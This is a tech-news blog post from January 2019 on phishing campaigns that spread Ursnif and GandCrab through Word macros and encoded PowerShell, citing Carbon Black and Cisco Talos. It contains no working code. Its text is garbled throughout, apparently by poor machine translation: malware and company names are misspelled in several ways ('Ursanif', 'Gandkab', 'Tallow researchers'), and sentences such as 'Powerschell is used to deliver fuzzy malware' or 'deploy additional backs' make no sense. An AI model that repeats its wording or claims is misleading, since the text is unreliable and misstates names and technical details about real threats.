GandCrab ransomware and Ursnif virus spreading via MS Word macros - World of Tech Science

Breaking Tech News,Reviews,Latest in science,Tips and Tricks,Analysis,Follow us for Latest...

Hot

Post Top Ad

Friday 25 January 2019

GandCrab ransomware and Ursnif virus spreading via MS Word macros

Security researchers have discovered two different malware campaigns, one of which is distributing Ursanif data-theft trojan and the Gandkab ransomware in the wild, while the other is only infecting victims with Ursanyaf malware.


However, both malware campaigns appear to work as two separate cyber groups, we see many similarities in them. Both attacks start with phishing emails, which contain an attached Microsoft Word document that is embedded with malicious macros and then Powerschell is used to deliver fuzzy malware.


Ursniff is a data-stealing malware that steals sensitive information from the compromised computer with the ability to collect banking credentials, browsing activities, keystrokes, system and process information and deploy additional backs.

Last year's search, GandCrab is a widespread ransomware threat, like every other ransomware in the market, encrypts files of an infected system, and urges victims to pay ransom in digital currency to unlock them. Its developers primarily pay in DASH, which is more complex to track.


MS Docs + VBS macros = Ursnif and GandCrab Infection

The first malware campaign that shared the dangers of two malware was discovered by Carbon Black's security researchers, which had approximately 180 variants of MS Word documents in the wild, targeting users with malicious VBS macros.


If successfully executed, then the malicious VBS macro runs a PowerShell script, which then uses a series of techniques to download and execute both the Ursnife and the Gandcrub on targeted Sysytems.






The PowerShell script is encoded in Base 64, which executes the next stage of the transition, which is responsible for downloading the main malware payload to compromise with the system.


The first payload is a PowerShell one-liner that evaluates the architecture of the targeted system and then downloads an additional payload from the Pastebin website accordingly, which is executed in memory, to address their activities for traditional anti-virus technologies. It is difficult to find


Carbon black researchers said, "This is a version of the PowerShell script Empire Invoc-Psyzact module, in which very few modifications have been done." "The script will take a built-in PE [portable executable] file that has been encoded with base 64 and which injects into the current process of process."


The final payload then installs a version of GandCrab ransomware on the victim's system, until they do not pay the ransom in the numeral currency, they are locked from their system.



In the meantime, malware also downloads a Ursnife executable to a remote server and once executed, it will fingerprint the system, the web browser will monitor traffic to collect data, and then it will be ordered by the attacker and Control (C & C) will be sent to the server.


"However, during this campaign, several Ursnip variants were hosted on Bevendbreak [.] Com site, Carbon Black was able to discover about 120 different Varsient Variants, which is known as Domain IceCondition [] Com and Bevendbreak [. ] Were being hosted with com. "The researchers said.

MS Docs + VBS macros = Ursnif Data-Stealing Malware


Similarly, the second malware campaign that was spotted by security researchers at Cisco Talos leverages a Microsoft Word document containing a malicious VBA macro to deliver another variant of same Ursnif malware.


This malware attack also compromises the target system in several steps, from phishing emails to running malicious PowerShell commands to obtain malicious persistence and then download and install the Ursnife data-stealing computer virus.


Talos researchers said, "PowerShell" has three parts, the first part creates a function, which is later used to decode the base 64 encoded power shell, the second part creates a byte array in which a malicious DLL happens, "Talos researchers explained.


"The third part executes the base 64 decoded function created in the first part, which is in the form of a base 64 encoded string as the parameter of the returned. Returned decoded power shell Later shorthand invoke-expression (IEXx) function Is executed by. "


Once executed on a victim computer, the malware collects information from the system, puts it in a cab file format, and then sends it over to HTTPS secure connection to its command-and-control server.


Tallow researchers have published a list of indicators of compromised machines (IOCs), as well as names of payload filenames dropped on compounding machines, on their blog posts that allow you to detect Ursnef malware before transmitting the network and Can help stop.

No comments:

Post a Comment

Post Top Ad